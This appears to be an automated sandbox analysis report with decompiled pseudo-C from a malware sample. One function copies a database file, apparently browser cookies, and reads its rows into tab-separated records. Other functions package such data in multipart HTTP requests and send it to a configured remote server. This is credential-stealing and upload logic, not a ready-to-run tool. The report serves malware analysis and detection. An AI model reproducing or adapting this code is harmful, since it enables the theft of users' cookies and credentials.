C-Code - Quality: 86%

			E00403F95(void* __ecx, void* __eflags, intOrPtr _a4, char _a8, char _a20, intOrPtr _a88, intOrPtr _a100, intOrPtr _a104) {
				void* _v16;
				char _v28;
				char _v32;
				char _v36;
				int _v40;
				char _v44;
				void* _v48;
				long _v52;
				void* _v56;
				void* _v60;
				char _v72;
				char _v84;
				int _v96;
				char* _v108;
				char _v120;
				char _v132;
				char _v144;
				char* _v160;
				short _v180;
				char* _v188;
				intOrPtr _v200;
				void _v204;
				char _v264;
				void _v2264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t192;
				void* _t204;
				void* _t233;
				void* _t260;
				void* _t261;
				void* _t373;
				void* _t376;
				long _t387;
				void* _t395;
				signed int _t403;
				void* _t408;
				void* _t409;
				signed int _t411;
				void* _t417;
				long _t435;
				void* _t507;
				void* _t508;
				void* _t509;
				void* _t512;

				_t518 = __eflags;
				_t509 = _t508 - 0xc;
				E0041011F( &_a8, __ecx, _t509, __eflags);
				_t192 = E00403907(); // executed
				_t411 = 0xf;
				_t403 = 0;
				memcpy( &_v204, _t192, _t411 << 2);
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v36 = 0;
				E0040F02C(0,  &_v32,  &_v40, _a100, _a104); // executed
				E0040F02C(0,  &_v44,  &_v36, _a88,  *0x61567c(_a88,  &_v264));
				_t512 = _t509 + 0x34;
				E004100ED(_a4, _t518, 0x411be1);
				E004100ED( &_v72, _t518, 0x411be1);
				E004100ED( &_v16, _t518, 0x411be1);
				E004100ED( &_v96, _t518, 0x411be1);
				E004100ED( &_v108, _t518, 0x411be1);
				_t204 = InternetOpenA(0, 1, 0, 0, 0);
				_push( *0x6153c0);
				_v60 = _t204;
				_push(_v200);
				if( *0x615784() == 0) {
					_t403 = 1;
				}
				_t521 = _v60;
				if(_v60 != 0) {
					_t233 = E0040EEA9(_t403,  &_v120, _t521, 0x14);
					_pop(_t417);
					E0041018C(E004101C6( &_v72, _t417, _t233,  &_v132, _t521), _t417,  &_v72);
					E00401859(_v132);
					E00401859(_v120);
					E0041018C(E00410208(E004101C6(E00410208( &_v96, _t417,  &_v144, _t521, "\r\n------"), _t417,  &_v72,  &_v132, _t521), _t417,  &_v120, _t521, "--\r\n"), _t417,  &_v96);
					E00401859(_v120);
					E00401859(_v132);
					E00401859(_v144);
					E0041018C(E004101C6(E00410208( &_v108, _t417,  &_v28, _t521,  *0x615070), _t417,  &_v72,  &_v84, _t521), _t417,  &_v108);
					E00401859(_v84);
					E00401859(_v28);
					_t260 = InternetConnectA(_v60, _v188, _v180, 0, 0, 3, 0, 0);
					_v56 = _t260;
					if(_t260 != 0) {
						asm("sbb ebx, ebx");
						_t261 = HttpOpenRequestA(_t260,  *0x6153dc, _v160,  *0x615208, 0, 0, ( ~_t403 & 0x00800000) + 0x400100, 0); // executed
						_v52 = _t261;
						_t523 = _t261;
						if(_t261 != 0) {
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E00401859(_v28);
							_t407 = "\r\n";
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v84, _t523,  *0x61523c), _t417,  &_v16);
							E00401859(_v84);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523,  *0x6153b4), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, _t417,  &_a20,  &_v28, _t523), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "\r\n"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v84, _t523,  *0x61523c), _t417,  &_v16);
							E00401859(_v84);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523,  *0x61533c), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, _v36), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "------"), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, _t417,  &_v72,  &_v28, _t523), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, _t407), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v84, _t523,  *0x61523c), _t417,  &_v16);
							E00401859(_v84);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523,  *0x615034), _t417,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, _t417,  &_v28, _t523, "\"\r\n\r\n"), _t417,  &_v16);
							E00401859(_v28);
							_t373 =  *0x61567c(_v96);
							_t408 = _v16;
							_t435 = _t373 + _v32 +  *0x61567c(_t408);
							_t376 = RtlAllocateHeap(GetProcessHeap(), 0, _t435); // executed
							_v48 = _t376;
							memcpy(_v48, _t408,  *0x61567c(_t408));
							memcpy(_v48 +  *0x61567c(_v32), _t408, _v40);
							memcpy(_v48 +  *0x61567c( *0x61567c(_v96)) + _v32, _t408, _v96);
							_t387 =  *0x61567c(_t435);
							_t409 = _v52;
							HttpSendRequestA(_t409, _v108, _t387, _v108, _v48);
							_v52 =  &_v48;
							memset(_v52, 0, 4 << 0);
							_t512 = _t512 + 0x30;
							while(InternetReadFile(_t409,  &_v2264, 0x7cf,  &_v52) != 0) {
								_t395 = _v52;
								__eflags = _t395;
								if(__eflags != 0) {
									 *((char*)(_t507 + _t395 - 0x8d4)) = 0;
									E0041018C(E00410208(_a4, 0,  &_v144, __eflags,  &_v2264), 0, _a4);
									E00401859(_v144);
									continue;
								}
								break;
							}
							InternetCloseHandle(_t409);
						}
						InternetCloseHandle(_v56);
					}
				}
				InternetCloseHandle(_v60);
				_v56 =  &_v40;
				memset(_v56, 0, 4 << 0);
				_v56 =  &_v36;
				memset(_v56, 0, 4 << 0);
				E00401859(_v72);
				E00401859(_v16);
				E00401859(_v96);
				E00401859(_v108);
				E00401859(0);
				E00401859(0);
				E00401859(0);
				E00401859(0);
				E004016CC( &_a8);
				E00401859(_a88);
				return _a4;
			}

0x00403f95
0x00403fa1
0x00403fa9
0x00403fb5
0x00403fbc
0x00403fc5
0x00403fcd
0x00403fd6
0x00403fd9
0x00403fdc
0x00403fdf
0x00403fe2
0x00403ffd
0x00404005
0x0040400e
0x00404017
0x00404020
0x00404029
0x00404032
0x0040403d
0x00404043
0x00404049
0x0040404c
0x0040405a
0x0040405c
0x0040405c
0x0040405d
0x00404061
0x0040406c
0x00404073
0x00404082
0x0040408a
0x00404092
0x004040c5
0x004040cd
0x004040d5
0x004040e0
0x00404101
0x00404109
0x00404111
0x0040412d
0x00404133
0x00404138
0x00404141
0x00404165
0x0040416b
0x0040416e
0x00404170
0x00404189
0x00404191
0x004041a4
0x004041ac
0x004041b1
0x004041c5
0x004041cd
0x004041e6
0x004041ee
0x00404207
0x0040420f
0x00404227
0x0040422f
0x00404245
0x0040424d
0x00404261
0x00404269
0x00404281
0x00404289
0x0040429f
0x004042a7
0x004042bb
0x004042c3
0x004042dc
0x004042e4
0x004042fd
0x00404305
0x0040431d
0x00404325
0x0040433b
0x00404343
0x00404357
0x0040435f
0x00404377
0x0040437f
0x00404392
0x0040439a
0x004043ae
0x004043b6
0x004043cf
0x004043d7
0x004043f0
0x004043f8
0x00404410
0x00404418
0x00404420
0x00404426
0x00404435
0x00404441
0x00404448
0x0040445c
0x00404472
0x00404492
0x0040449e
0x004044a4
0x004044ac
0x004044b5
0x004044c2
0x004044c2
0x00404502
0x004044cb
0x004044ce
0x004044d0
0x004044d2
0x004044f2
0x004044fd
0x00000000
0x004044fd
0x00000000
0x004044d0
0x0040451a
0x0040451a
0x00404523
0x00404523
0x00404138
0x0040452c
0x00404535
0x00404542
0x00404547
0x00404554
0x00404559
0x00404561
0x00404569
0x00404571
0x00404578
0x0040457f
0x00404586
0x0040458d
0x00404595
0x0040459d
0x004045a9

APIs

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Part of subcall function 00403907: malloc.MSVCRT ref: 00403939
Part of subcall function 00403907: malloc.MSVCRT ref: 0040393F
Part of subcall function 00403907: malloc.MSVCRT ref: 00403945
Part of subcall function 00403907: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00403957
Part of subcall function 00403907: InternetCrackUrlA.WININET(000000FF,00000000), ref: 0040395F

lstrlen.KERNEL32(?), ref: 00403FEE

Part of subcall function 0040F02C: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F04C
Part of subcall function 0040F02C: GetProcessHeap.KERNEL32(00000000,?,?,00403FE7,?,?,?,?,?,?,?), ref: 0040F059
Part of subcall function 0040F02C: RtlAllocateHeap.NTDLL(00000000,?,00403FE7), ref: 0040F060

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040403D
StrCmpCA.SHLWAPI(?), ref: 00404052
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040412D
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,-00400100,00000000), ref: 00404165

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

lstrlen.KERNEL32(?,",00413FCC,------,00413FCC,?,",00413FCC,------,00413FCC,",00413FCC,------), ref: 00404420
lstrlen.KERNEL32(?), ref: 0040442C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040443A
RtlAllocateHeap.NTDLL(00000000), ref: 00404441
lstrlen.KERNEL32(?), ref: 0040444B
memcpy.MSVCRT ref: 0040445C
lstrlen.KERNEL32(?,?,?), ref: 00404468
memcpy.MSVCRT ref: 00404472
lstrlen.KERNEL32(?), ref: 0040447A
lstrlen.KERNEL32(?,?,00000000), ref: 00404485
memcpy.MSVCRT ref: 00404492
lstrlen.KERNEL32(?,?,?), ref: 0040449E
HttpSendRequestA.WININET(?,?,00000000), ref: 004044AC
InternetReadFile.WININET(?,?,000007CF,?), ref: 0040450F
InternetCloseHandle.WININET(?), ref: 0040451A
InternetCloseHandle.WININET(?), ref: 00404523
InternetCloseHandle.WININET(00000000), ref: 0040452C

Strings

------, xrefs: 0040409C
", xrefs: 00404214, 0040430A, 004043FD
--, xrefs: 00404097
------, xrefs: 00404176, 0040426E, 00404364

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$Heap$CloseHandlemallocmemcpy$AllocateHttpOpenProcessRequestlstrcat$BinaryConnectCrackCryptFileReadSendString
String ID: ------$"$--$------
API String ID: 508137646-1406108388
Opcode ID: 212658596fd30cfcb81be823e2a25b54c76f8be257d96941331a9685d39507b7
Instruction ID: 4111120b63f7bd162e1c063b9ca0eb91cb0e66b5013554be49004608af80ca4a
Opcode Fuzzy Hash: 212658596fd30cfcb81be823e2a25b54c76f8be257d96941331a9685d39507b7
Instruction Fuzzy Hash: F002A572D0011DEBCF00FBA5DC469DEBB79EF04308F11816AE611B7161DB796E868B98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C8D Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 351
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E00405C8D(void* __ecx, void* __eflags, CHAR* _a4, char _a16, char _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, char _a52) {
				void _v8;
				char _v12;
				char _v16;
				char _v28;
				CHAR* _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v100;
				char _v112;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t128;
				void* _t149;
				char* _t153;
				void* _t167;
				void* _t185;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t212;
				void* _t214;
				void* _t216;
				void* _t231;
				intOrPtr* _t235;
				void* _t252;
				void* _t257;
				char* _t263;
				void* _t264;
				void* _t265;
				void* _t270;
				void* _t282;
				char* _t288;
				char* _t301;
				char* _t315;
				char* _t316;
				void* _t321;
				void* _t322;
				void* _t324;
				void* _t325;

				_t264 = __ecx;
				if(E0041025C( &_a28,  *0x61529c) != 0) {
					L2:
					E00410148(_t264,  &_a16, 0x411be1);
					goto L4;
				} else {
					_t257 = E0041025C( &_a28,  *0x6152b8);
					_t329 = _t257;
					if(_t257 == 0) {
						__eflags = E0041025C( &_a16,  *0x615458);
						if(__eflags == 0) {
							L4:
							E004100ED( &_v40, _t329, 0x411be1);
							E0041018C(E00410208( &_v40, _t264,  &_v112, _t329,  *0x6153e4), _t264,  &_v40);
							E00401859(_v112);
							_t128 = E0040EEA9(0x411be1,  &_v100, _t329, 0x1a);
							_pop(_t265);
							E0041018C(E004101C6( &_v40, _t265, _t128,  &_v112, _t329), _t265,  &_v40);
							E00401859(_v112);
							E00401859(_v100);
							CopyFileA(_a4, _v40, 1); // executed
							E004100ED( &_v28, _t329, 0x411be1);
							E0041018C(E00410208( &_v28, _t265,  &_v112, _t329,  *0x6151c4), _t265,  &_v28);
							E00401859(_v112);
							E0041018C(E00410208( &_v28, _t265,  &_v112, _t329, 0x411be4), _t265,  &_v28);
							E00401859(_v112);
							_t149 = E004101C6( &_v28, _t265,  &_a28,  &_v112, _t329);
							_t301 =  &_v28;
							E0041018C(_t149, _t265, _t301);
							E00401859(_v112);
							_t153 = _t301;
							_t330 = _a48;
							if(_a48 == 0) {
								E0041018C(E00410208(_t153, _t265,  &_v112, __eflags, "_"), _t265,  &_v28);
								E00401859(_v112);
								E0041018C(E00410208(E004101C6( &_v28, _t265,  &_a16,  &_v100, __eflags), _t265,  &_v112, __eflags,  *0x615248), _t265,  &_v28);
								E00401859(_v112);
							} else {
								E0041018C(E00410208(_t153, _t265,  &_v100, _t330,  *0x615248), _t265,  &_v28);
							}
							E00401859(_v100);
							_t167 =  *0x6155c0(_v40,  &_v16); // executed
							if(_t167 == 0) {
								_t185 =  *0x61557c(_v16,  *0x615240, 0xffffffff,  &_v12, 0); // executed
								_t322 = _t321 + 0x14;
								if(_t185 == 0) {
									_t189 = RtlAllocateHeap(GetProcessHeap(), 0, 0x5f5e0ff); // executed
									_v8 = _t189;
									_t190 =  *0x615598(_v12);
									_pop(_t270);
									_t333 = _t190 - 0x64;
									if(_t190 == 0x64) {
										_t263 = "0";
										_t288 = "\t";
										do {
											E004100ED( &_v112, _t333,  *0x6155b4(_v12, 0));
											E004100ED( &_v64, _t333,  *0x6155b4(_v12, 1));
											E004100ED( &_v100, _t333,  *0x6155b4(_v12, 2));
											E004100ED( &_v52, _t333,  *0x6155b4(_v12, 3));
											E004100ED( &_v76, _t333,  *0x6155b4(_v12, 4));
											_t212 =  *0x6155b4(_v12, 5);
											_pop(_t282);
											E004100ED( &_v88, _t333, _t212);
											_t214 =  *0x615784(_v64, _t263);
											_t315 =  &_v64;
											if(_t214 != 0) {
												_push( *0x615048);
											} else {
												_push( *0x615334);
											}
											E00410148(_t282, _t315);
											_t216 =  *0x615784(_v52);
											_t316 =  &_v52;
											if(_t216 != 0) {
												_push( *0x615048);
											} else {
												_push( *0x615334);
											}
											E00410148(_t282, _t316);
											if( *_v76 == 0x2d) {
												E00410148(_t282,  &_v76, _t263);
											}
											_t70 =  &_v8; // 0x406ee6
											 *0x61575c( *_t70, _v112);
											_t71 =  &_v8; // 0x406ee6
											 *0x61575c( *_t71, _t288);
											 *0x61575c(_v8, _v64);
											 *0x61575c(_v8, _t288);
											 *0x61575c(_v8, _v100);
											 *0x61575c(_v8, _t288);
											 *0x61575c(_v8, _v52);
											 *0x61575c(_v8, _t288);
											 *0x61575c(_v8, _v76);
											 *0x61575c(_v8, _t288);
											 *0x61575c(_v8, _v88);
											 *0x61575c(_v8, _t288);
											_t231 =  *0x6155a4(_v12, 6, _a40, _a44);
											_t235 = E0040566F(_t231,  &_v124,  *0x6155ac(), _v12, 6);
											_t322 = _t322 + 0x20;
											 *0x61575c(_v8,  *_t235);
											E00401859(_v124);
											 *0x61575c(_v8, "\n");
											E00401859(_v88);
											E00401859(_v76);
											E00401859(_v52);
											E00401859(_v100);
											E00401859(_v64);
											E00401859(_v112);
											_t252 =  *0x615598(_v12);
											_pop(_t270);
										} while (_t252 == 0x64);
									}
									_t102 =  &_v8; // 0x406ee6
									_t191 =  *0x61567c( *_t102);
									_t338 = _t191 - 5;
									if(_t191 > 5) {
										_push( *0x61567c(_v8));
										_push(_v8);
										_t324 = _t322 - 0xc;
										E0041011F( &_v28, _t270, _t324, _t338);
										_t325 = _t324 - 0x50;
										E004016EB( &_a52, _t325);
										_push( &_v124);
										E00403F95(_t270, _t338);
										_t322 = _t325 + 0x68;
										E00401859(_v124);
									}
									memset( &_v8, 0, 4);
								}
								 *0x61559c(_v12);
								 *0x6155c4(_v16); // executed
							}
							DeleteFileA(_v40); // executed
							E00401859(_v40);
							E00401859(_v28);
							E00401859(0);
							E00401859(0);
						}
					} else {
						goto L2;
					}
				}
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a52);
			}

0x00405c8d
0x00405cab
0x00405cbf
0x00405cc3
0x00000000
0x00405cad
0x00405cb6
0x00405cbb
0x00405cbd
0x00405cd8
0x00405cda
0x00405ce0
0x00405ce4
0x00405cfd
0x00405d05
0x00405d0f
0x00405d16
0x00405d25
0x00405d2d
0x00405d35
0x00405d42
0x00405d4c
0x00405d67
0x00405d6f
0x00405d87
0x00405d8f
0x00405d9d
0x00405da2
0x00405da5
0x00405dad
0x00405db2
0x00405db4
0x00405db7
0x00405de1
0x00405de9
0x00405e0d
0x00405e15
0x00405db9
0x00405dca
0x00405dca
0x00405e1d
0x00405e29
0x00405e33
0x00405e49
0x00405e4f
0x00405e54
0x00405e67
0x00405e70
0x00405e73
0x00405e79
0x00405e7a
0x00405e7d
0x00405e83
0x00405e88
0x00405e8d
0x00405e9e
0x00405eb4
0x00405eca
0x00405ee0
0x00405ef6
0x00405f00
0x00405f07
0x00405f0c
0x00405f15
0x00405f1b
0x00405f20
0x00405f2a
0x00405f22
0x00405f22
0x00405f22
0x00405f30
0x00405f39
0x00405f3f
0x00405f44
0x00405f4e
0x00405f46
0x00405f46
0x00405f46
0x00405f54
0x00405f5f
0x00405f65
0x00405f65
0x00405f6d
0x00405f70
0x00405f77
0x00405f7a
0x00405f86
0x00405f90
0x00405f9c
0x00405fa6
0x00405fb2
0x00405fbc
0x00405fc8
0x00405fd2
0x00405fde
0x00405fe8
0x00405ff9
0x00406016
0x0040601b
0x00406023
0x0040602c
0x00406039
0x00406042
0x0040604a
0x00406052
0x0040605a
0x00406062
0x0040606a
0x00406072
0x00406078
0x00406079
0x00405e8d
0x00406082
0x00406085
0x0040608b
0x0040608e
0x00406099
0x0040609a
0x004060a0
0x004060a5
0x004060aa
0x004060b2
0x004060ba
0x004060bb
0x004060c3
0x004060c6
0x004060c6
0x004060d3
0x004060d9
0x004060df
0x004060e9
0x004060ef
0x004060f3
0x004060fc
0x00406104
0x0040610b
0x00406112
0x00406112
0x00000000
0x00000000
0x00000000
0x00405cbd
0x0040611a
0x00406122
0x0040612a
0x0040613b

APIs

Part of subcall function 0041025C: StrCmpCA.SHLWAPI(?,?,?,00405CA4,?,?,?), ref: 00410265

CopyFileA.KERNEL32(?,?,00000001), ref: 00405D42
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405E60
RtlAllocateHeap.NTDLL(00000000), ref: 00405E67
StrCmpCA.SHLWAPI(?,0041404C,00000000), ref: 00405F15
StrCmpCA.SHLWAPI(?,0041404C), ref: 00405F39
lstrcat.KERNEL32(n@,?), ref: 00405F70
lstrcat.KERNEL32(?,00414050), ref: 00405F7A
lstrcat.KERNEL32(?,?), ref: 00405F86
lstrcat.KERNEL32(?,00414050), ref: 00405F90
lstrcat.KERNEL32(?,?), ref: 00405F9C
lstrcat.KERNEL32(?,00414050), ref: 00405FA6
lstrcat.KERNEL32(?,?), ref: 00405FB2
lstrcat.KERNEL32(?,00414050), ref: 00405FBC
lstrcat.KERNEL32(?,?), ref: 00405FC8
lstrcat.KERNEL32(?,00414050), ref: 00405FD2
lstrcat.KERNEL32(?,?), ref: 00405FDE
lstrcat.KERNEL32(?,00414050), ref: 00405FE8

Part of subcall function 0040566F: memcmp.MSVCRT ref: 0040568D
Part of subcall function 0040566F: memset.MSVCRT ref: 004056BF
Part of subcall function 0040566F: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 004056F5

lstrcat.KERNEL32(?,00000000), ref: 00406023
lstrcat.KERNEL32(?,00414044), ref: 00406039
lstrlen.KERNEL32(n@), ref: 00406085
lstrlen.KERNEL32(?), ref: 00406093
memset.MSVCRT ref: 004060D3
DeleteFileA.KERNEL32(?,?), ref: 004060F3

Strings

n@, xrefs: 00406082, 00405F6D, 00405F77

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$FileHeaplstrlenmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID: n@
API String ID: 1709161455-1771279141
Opcode ID: ca5de176252de4f632f08bb4046597333c6faff2d9422766a641f3ae6f0e49cb
Instruction ID: 37518457b0603d0206fee6b09db3fab40e7538475de4214120430c16e1158219
Opcode Fuzzy Hash: ca5de176252de4f632f08bb4046597333c6faff2d9422766a641f3ae6f0e49cb
Instruction Fuzzy Hash: 52D1E932D00509EBCF01BBA1ED0A9CDBB7AEF44308F14806AF506B71B1DB796E959B54

Uniqueness

Uniqueness Score: -1.00%

Function 004045AA Relevance: 37.1, APIs: 19, Strings: 2, Instructions: 388
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004045AA(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a88) {
				void* _v16;
				char _v28;
				long _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v56;
				int _v68;
				void* _v72;
				char _v84;
				char* _v96;
				char _v108;
				char* _v124;
				short _v144;
				char* _v152;
				intOrPtr _v164;
				void _v168;
				void _v368;
				char _v428;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t168;
				void* _t175;
				void* _t179;
				void* _t204;
				void* _t245;
				void* _t250;
				void* _t327;
				long _t330;
				long _t337;
				int _t341;
				long _t342;
				void* _t350;
				long _t353;
				void* _t354;
				signed int _t356;
				void* _t358;
				long _t441;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t448;

				_t452 = __eflags;
				_t446 = _t445 - 0xc;
				E0041011F( &_a8, __ecx, _t446, __eflags);
				_push( &_v428); // executed
				_t168 = E00403907(); // executed
				_t356 = 0xf;
				memcpy( &_v168, _t168, _t356 << 2);
				_t448 = _t446 + 0x1c;
				E004100ED(_a4, _t452, 0x411be1);
				E004100ED( &_v84, _t452, 0x411be1);
				E004100ED( &_v16, _t452, 0x411be1);
				E004100ED( &_v68, _t452, 0x411be1);
				E004100ED( &_v96, _t452, 0x411be1);
				_t175 = InternetOpenA(0, 1, 0, 0, 0);
				_push( *0x6153c0);
				_v72 = _t175;
				_push(_v164);
				_v32 = 0;
				if( *0x615784() == 0) {
					_v32 = 1;
				}
				_t454 = _v72;
				if(_v72 != 0) {
					_t204 = E0040EEA9(_t350,  &_v56, _t454, 0x14);
					_pop(0);
					E0041018C(E004101C6( &_v84, 0, _t204,  &_v108, _t454), 0,  &_v84);
					E00401859(_v108);
					E00401859(_v56);
					_t352 = "\r\n";
					E0041018C(E00410208( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t454, "------"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E004101C6( &_v68, 0,  &_v84,  &_v56, _t454), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t454, "--"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t454, "\r\n"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E004101C6(E00410208( &_v96, 0,  &_v28, _t454,  *0x615070), 0,  &_v84,  &_v108, _t454), 0,  &_v96);
					E00401859(_v108);
					E00401859(_v28);
					_t245 = InternetConnectA(_v72, _v152, _v144, 0, 0, 3, 0, 0);
					_v36 = _t245;
					if(_t245 != 0) {
						asm("sbb eax, eax");
						_t250 = HttpOpenRequestA(_v36,  *0x6153dc, _v124,  *0x615208, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0);
						_v32 = _t250;
						_t456 = _t250;
						if(_t250 != 0) {
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v56, _t456,  *0x61523c), 0,  &_v16);
							E00401859(_v56);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456,  *0x6153b4), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_a20,  &_v28, _t456), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, "------"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_v84,  &_v28, _t456), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, _t352), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v56, _t456,  *0x61523c), 0,  &_v16);
							E00401859(_v56);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456,  *0x615050), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t456, "\"\r\n\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_a88,  &_v28, _t456), 0,  &_v16);
							E00401859(_v28);
							_t327 =  *0x61567c(_v68);
							_t441 = _t327 +  *0x61567c(_v16);
							_t330 = RtlAllocateHeap(GetProcessHeap(), 0, _t441);
							_t353 = _t330;
							memcpy(_t353, _v16,  *0x61567c(_v16));
							memcpy( *0x61567c( *0x61567c(_v68)) + _t353, _v16, _v68);
